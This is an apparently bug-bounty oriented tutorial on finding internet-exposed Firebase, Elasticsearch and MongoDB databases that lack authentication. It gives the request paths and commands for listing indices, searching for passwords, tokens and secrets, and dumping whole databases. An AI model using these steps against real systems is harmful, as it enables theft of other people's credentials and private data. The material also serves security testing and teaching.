Introduction
Database an organized collection of data generally stored accessed electronically. Attacking a web application a lot of the time one of the main goals is to compromise the back-end database as it’s where all the sensitive user data is stored.
Compromising these databases normally involves exploiting an sql injection vulnerability but sometimes it can be much easier. These databases are often exposed to the internet without authentication leaving them open to hackers for pillaging as discussed in the following sections.
Google Firebase: –
Introduction
According to Google “The Firebase Realtime Database is a cloud-hosted database stored as JSON and synchronized in realtime to every connected client”. An issue can arise in firebase when developers fail to enable authentication. This vulnerability is very similar to every other database misconfiguration, there’s no authentication. Leaving a database exposed to the world unauthenticated is an open invite for malicious hackers.
Misconfigured Firebase Database
When i’m hunting for this I’ll try to keep an eye out for the “*.firebaseio.com” url, if you see this then you know your target is utilizing Google’s firebase DB. An example domain can be found below:
● Vuln-domain.firebaseio.com
If the developer forgot to enable authentication the database will be exposed to the word. You can easily view the database by appending a “/.json” to the url as shown below:
● vuln-domain.firebaseio.com/.json
As you can see above we were able to dump a bunch of passwords belonging to an organization. An attacker could then leverage these credentials to perform additional attacks on the application.
Summary:-
Finding and exploiting this misconfiguration is extremely easy and requires zero technical skills to pull off. All you need to do is find an application using firebase, append “/.json” to the url, and if there isn’t authentication you can export the entire DB!
ElasticSearch DB:-
Introduction
You have probably heard of the popular relational database called MySQL. Elastic search like MySQL is a database used to hold and query information. However, elastic search is typically used to perform full text searches on very large datasets. Another thing to note is that Elasticsearch is unauthenticated by default which can cause a lot of security problems as described in the following sections.
Elasticsearch Basics: –
According to Google “ElasticSearch is a document- oriented database designed to store, retrieve, and manage document-oriented or semi-structured data. When you use Elasticsearch, you store data in JSON document form. Then, you query them for retrieval.” Unlike MySQL which stores its information in tables, elastic search uses something called types. Each type can have several rows which are called documents.
Documents are basically a json blob that hold your data as shown in the example below:
● {“id”:1, “name”:”ghostlulz”, “password”:”SuperSecureP@ssword”}
In MySQL we use column names but in Elasticsearch we use field names. The field names in the above json blob would be id, name, and password. In MySQL we would store all of our tables in a database.
In Elastic Search we store our documents in something called an index. An index is basically a collection of documents.
Unauthenticated ElasticSearch DB:-
Elastic search has an http server running on port 9200 that can be used to query the database. The major issue here is that a lot of people expose this port to the public internet without any kind of authentication. This means anyone can query the database and extract information. A quick Shodan search will produce a tun of results as shown below:
Once you have identified that your target has port 9200 open you can easily check if it is an ElasticSearch database by hitting the root directory with a GET request. The response should look something like the following:
Once you know an endpoint has an exposed Elastic Search db try to find all the indexes(Databases) that are available. This can be done by hitting the “/_cat/indices?v” endpoint with a GET request. This will list out all of the indexes as shown below:
This information along with other details about the service can also be found by querying the “/_stats/?pretty=1” endpoint. To perform a full text search on the database you can use the following command
“/_all/_search?q=email”. This will query every index for the word “email”. There are a few words that I like to search for which include:
● Username
● Email
● Password
● Token
● Secret
● Key
If you want to query a specific index you can replace the word “_all” with the name of the index you want to search against.
Another useful technique is to list all of the field names by making a GET request to the “/INDEX_NAME_HERE/_mapping?pretty=1” endpoint. I typically search for interesting field names such as:
● Username
● Email
● Password
● Token
● Secret
● Key
The output should look something like this:
As you can see above we have the field names addressable_type, city, and much more which isn’t displayed as the output was too large.
To query all values that contain a specific field name use the following command “/_all/_search?q=_exists:email&pretty=1” . This will return documents that contain a field name(column) named email as shown below:
Again you can replace “_all” with the name of an index to perform searches specifically against that endpoint.
Summary
ElasticSearch is just another database where you can store and query information. The major problem is that people expose the unauthenticated web service to the public. With unauthenticated access to the web service attackers can easily dump the entire database. Always be on the lookout for port 9200.
Mongo Database:-
Introduction
Like Elasticsearch MongoDB is a nosql database that uses JSON-like documents to store data. Also similar to the rest of the databases we have talked about Mongo DB fails to implement authentication by default. This means it’s up to the user to enable this which they often forget.
MongoDB:-
If you’re searching for MongoDB instances, be on the lookout for port 27017. As mentioned earlier MongoDB doesn’t have authentication enabled by default so to test for this vulnerability just try to login. To do this I normally just use the mongo cli as shown below:
● mongo ip-address-here
Once logged into the database try issuing a command, if you get an “unauthorized” error message prompting for authentication then the endpoint has authentication enabled.
However, if you can run arbitrary commands against the system then authentication has not been set up and you can do whatever you want.
Summary
If you see port 27017 open or any other MongoDB associate port make sure to test the endpoint to see if its missing authentication. Exploiting this misconfiguration is as easy as connecting to the database and extracting the data. This is as easy as it gets folks.
Conclusion
If an application needs to store data chances are its being stored in a database. These databases hold all kinds of sensitive information such as passwords, tokens, private messages, and everything else. That’s why databases are always popular targets by hackers. Since these are such popular targets you would think they would be fairly secure but they aren’t. A lot of databases are missing authentication by default! This means if connected to the internet anyone could connect to these devices to extract the information they hold.
